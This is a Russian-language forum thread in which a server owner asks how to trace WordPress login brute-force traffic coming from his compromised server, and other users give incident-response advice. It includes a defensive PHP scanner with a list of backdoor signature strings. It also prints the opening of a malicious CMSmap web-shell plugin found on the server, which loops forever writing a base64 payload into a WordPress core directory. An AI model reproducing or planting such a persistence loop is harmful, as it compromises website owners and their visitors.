DOS attack из моего сервера / Unix-системы

2.0.35

Планшетная версия Контакт Правила FAQ Помощь

Гость

Нов. | Гор. | Избр.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / Unix-системы [игнор отключен] [закрыт для гостей] / DOS attack из моего сервера / 25 сообщений из 27, страница 1 из 2

все

23.10.2020, 11:18

#40011121

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

Добрый день,

мне пожаловались , что из моего сервера идут запросы вида

- - [23/Oct/2020:04:24:45 +0200] "GET /wp-login.php HTTP/1.1" 200 1761 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.45.107.161 - - [23/Oct/2020:04:24:45 +0200] "POST /xmlrpc.php HTTP/1.1" 403 1228 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
- - [23/Oct/2020:04:24:45 +0200] "POST /wp-login.php HTTP/1.1" 200 1851 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
- - [23/Oct/2020:05:25:13 +0200] "POST /wp-login.php HTTP/1.1" 200 2642 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
- - [23/Oct/2020:05:25:13 +0200] "POST /wp-login.php HTTP/1.1" 200 2626 "-"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

как быстро определить, кто шлет такие запросы ?

ставил на сервер wordpress и opencard

на сервере стоить php nginx mysql

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 11:28

#40011127

Алексей Роза

Гость

DOS attack из моего сервера

https://www.google.com/search?channel=fs&client=ubuntu&q=hacked server clean

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 12:19

#40011142

peter64

Участник

Сообщения: 233
Рейтинг: 0 / 0

DOS attack из моего сервера

YuriyB,
1. Процесс на порту 80 : fuser 80/tcp. (1 цифра PID)
2.имя процесса : ls -l /proc/PID/exe
Ну а далее по обстоятельствам ...

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 12:41

#40011148

Алексей Роза

Гость

DOS attack из моего сервера

запросы могут выходить с любого порта

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 12:50

#40011156

Dimitry Sibiryakov

Участник

Сообщения: 54 521
Рейтинг: 0 / 0

DOS attack из моего сервера

И PID апача ничего не даст.

Аффтар, просто сноси всё и разворачивай чистый образ. Потом запрещай запись в каталоги со
скриптами своему апачу.
Posted via ActualForum NNTP Server 1.5

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 13:04

#40011171

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

Dimitry Sibiryakov,

вообще то у меня nginx

все таки хочу найти проблему.

жаль исходящие запросы не логируются

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 13:17

#40011180

Dimitry Sibiryakov

Участник

Сообщения: 54 521
Рейтинг: 0 / 0

DOS attack из моего сервера

YuriyBжаль исходящие запросы не логируются

А смысл? Они будут идти от твоего nginx-а. Просто закрывай файерволлом исходящие
соединения на 80 и 403, а потом сравнивай список файлов скриптов с тем, который тебе
нужен. Лишние - читай или грепай на предмет "wp-login".
Posted via ActualForum NNTP Server 1.5

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 13:21

#40011182

fkthat

Участник

Сообщения: 3 601
Рейтинг: 0 / 0

DOS attack из моего сервера

Dimitry Sibiryakov

сноси всё и разворачивай чистый образ.

Еще +10 баллов в пользу докеров.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 14:49

#40011234

Алексей Роза

Гость

DOS attack из моего сервера

YuriyB

Dimitry Sibiryakov,

вообще то у меня nginx

все таки хочу найти проблему.

жаль исходящие запросы не логируются

проблема в какой-нибудь дырявой CMS, типа WP или джумлы
или в их многочисленных плагинах, где дырявые каждый третий

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 15:45

#40011267

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

ну это понятно..

как найти кто отсылает , какой скрипт ?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 15:59

#40011276

mayton

Участник

Откуда: loopback
Сообщения: 53 422
Рейтинг: 0 / 0

DOS attack из моего сервера

YuriyB

ну это понятно..

как найти кто отсылает , какой скрипт ?

Попробуй отключи opencard и wordpress поочередно и понаблюдай.

Или если есть возможность подними opencard/wordpress в разных
окружениях (хостах или докерах) или в разных apache процессах.

Чтоб логи были раздельными.

Дальше - по ситуации.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 19:09

#40011366

Barlone

Участник

Сообщения: 1 506
Рейтинг: 0 / 0

DOS attack из моего сервера

mayton

А смысл отключать поочередно, когда сервер уже взломали и что-то туда залили? Или имеется ввиду установить начисто все заново, и ждать пока снова взломают?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 19:25

#40011374

fkthat

Участник

Сообщения: 3 601
Рейтинг: 0 / 0

DOS attack из моего сервера

YuriyB

жаль исходящие запросы не логируются

Воткнуть на время прокси может поможет? Но только непонятно, что тебе даст его лог исходящих. Покажет просто то же самое, что тебе жалобщики присылают.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 19:43

#40011383

mayton

Участник

Откуда: loopback
Сообщения: 53 422
Рейтинг: 0 / 0

DOS attack из моего сервера

Barlone

mayton

А это к автору вопрос. Он хочет разобраться от какого модуля идёт атака? Или просто устранить?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 20:06

#40011398

Алексей Роза

Гость

DOS attack из моего сервера

да там уже бэкдор на сервере

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 20:32

#40011410

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

mayton,

хочу разобраться..

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 20:32

#40011411

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

Алексей Роза,

есть какой то сканер для этого?

я пару запустил ничего не нашли

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 20:42

#40011413

Алексей Роза

Гость

DOS attack из моего сервера

да есть там всякие, изучай
https://revisium.com/ru/we_can/

Код: php

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.

#!/usr/bin/php

<?php

/* вот скрипт, который ищет кое-какие инъекции (запускать из консоли):
предварительно сделать:
find -type -f -name "*.php" -print > list.txt
*/

$list = file("list.txt");

$v = array(
'$GLOBALS[$GLOBALS',
'$alphabet',
'get_root_path',
'bokoinchina',
'chosen_dirs_indexes',
'"test_url"',
"'test_url'",
'PCLZIP_READ_BLOCK',
'MD5(strrev',
'ALREADY_RUN',
'eval/*',
'@$_COOKIE["user"]',
'include_once("index.php")',
'@include "\x',
'file test okay',
'PCLZIP_SEPARATOR',
'index.html.bak.bak',
'<?php ${',
'#Yandex#',
'$user_agent_to_filter',
'"templates/".$dir."',
'].$GLOBALS[',
'($GLOBALS[$GLOBALS',
);

$files = array();

foreach ($list as $file){

    $file=trim($file);
    if($file=='') continue;

     if(filesize($file)<5) continue;

    $str=@file_get_contents($file);
    if(!$str||$str===false) { echo "\nunable open:\n{$file}\n";continue;}

    foreach ($v as $i){
       if(strpos($str,$i)!==false) {
         if(!isset($files[$file])) {
             $files[$file]="{$file} -- {$i}";
             echo "{$file} : {$i}\n";
         }
       }
   }
}

#fclose($a);

$z=fopen("__found__.txt","w");
fputs($z,join("\n",$files));
fclose($z);

я бы на твоём месте снёс всё говно с сервера
или даже переставил сервак
теперь как можно быть уверенным в чём-то

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 20:50

#40011416

mayton

Участник

Откуда: loopback
Сообщения: 53 422
Рейтинг: 0 / 0

DOS attack из моего сервера

Так он не разберется.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 21:38

#40011426

Basil A. Sidorov

Участник

Сообщения: 11 633
Рейтинг: 0 / 0

DOS attack из моего сервера

Проблема: "Сервер заражён вирусом".
Решение: "Переустановить сервер начисто".
Возражение: "Так он ни в чём не разберётся".

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 22:00

#40011434

Dimitry Sibiryakov

Участник

Сообщения: 54 521
Рейтинг: 0 / 0

DOS attack из моего сервера

YuriyBесть какой то сканер для этого?

grep.
Posted via ActualForum NNTP Server 1.5

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 22:15

#40011440

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

в папке плагинов ворпреса нашел какие то странные папки с названиями типа
vnaaqhb
внутри

Код: php

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.

<?php 
 /**
 * Plugin Name: CMSmap - WordPress Shell
 * Plugin URI: https://github.com/m7x/cmsmap/
 * Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
 * Version: 1.0
 * Author: CMSmap
 * Author URI: https://github.com/m7x/cmsmap/
 * License: GPLv2
 */
 set_time_limit(0);ignore_user_abort(1);while(1){file_put_contents($_SERVER['DOCUMENT_ROOT'].'//wp-includes//css//css.php',base64_decode('PD9waHANCi8qKg0KICog...........................

а что они могли еще натровориь, кроме рассылки дос аттак ?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 22:19

#40011442

YuriyB

Участник

Сообщения: 1 124
Рейтинг: 0 / 0

DOS attack из моего сервера

YuriyB,

логирование исходящего трафика лучше с

iptables -I OUTPUT -j LOG --log-prefix "iptables: "

можно добавлять много параметров

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 22:23

#40011443

mayton

Участник

Откуда: loopback
Сообщения: 53 422
Рейтинг: 0 / 0

DOS attack из моего сервера

Basil A. Sidorov

Переустановит начисто тот-же состав плагинов и - вуаля. Снова вирус.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

23.10.2020, 22:46

#40011445

Basil A. Sidorov

Участник

Сообщения: 11 633
Рейтинг: 0 / 0

DOS attack из моего сервера

mayton

Переустановит начисто тот-же состав плагинов и - вуаля. Снова вирус.

может не будем опускаться до анекдотических ситуаций?В атаке участвовало восемьсот миллионов китайцев.
Каждый второй использовал пароль "МаоДзедун".
На 423896-й попытке сервер согласился, что его пароль - "МаоДзедун".

Мысль: "надо что-нибудь поменять" - настолько свежая и оригинальная, что вообще никак не укладывается в мозг, испорченный режимом "Next, next, next"?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

все

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=25&mobile=1&tid=1480978]:	0ms
get settings:	12ms
get forum list:	13ms
check forum access:	4ms
check topic access:	4ms
track hit:	69ms
get topic data:	11ms
get forum data:	3ms
get page messages:	57ms
get tp. blocked users:	1ms
others:	13ms

total:	187ms